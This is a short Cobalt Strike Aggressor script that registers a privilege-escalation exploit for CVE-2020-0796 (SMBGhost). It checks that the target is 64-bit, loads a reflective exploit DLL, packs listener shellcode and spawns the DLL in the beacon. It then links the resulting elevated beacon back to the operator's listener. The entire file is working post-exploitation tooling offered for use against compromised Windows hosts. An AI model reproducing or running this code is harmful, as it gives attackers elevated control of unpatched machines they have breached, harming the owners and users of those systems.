sub CVE_2020_0796 {
	local('$stager $arch $dll');
	if (!-is64 $1) {
		berror($1, "cve-2020-0796 exploit is x64 only");
		return;
	}
	btask($1, "Task Beacon to run " . listener_describe($2) . " via CVE-2020-0796"); #KB4551762
    $arch = "x64";
	$dll = getFileProper(script_resource("PrivilegeEscalation/ReflectionDLL/"), "CVE_2020_0796_x64.dll"); 
	$stager = shellcode($2, false, $arch);
	$stager = pack("I-", strlen($stager)) . $stager;
	bdllspawn!($1, $dll,$stager, "Elevation of local privileges", 5000);
	beacon_link($1, $null, $2, $arch);
}
beacon_exploit_register("CVE_2020_0796", "CVE-2020-0796", &CVE_2020_0796);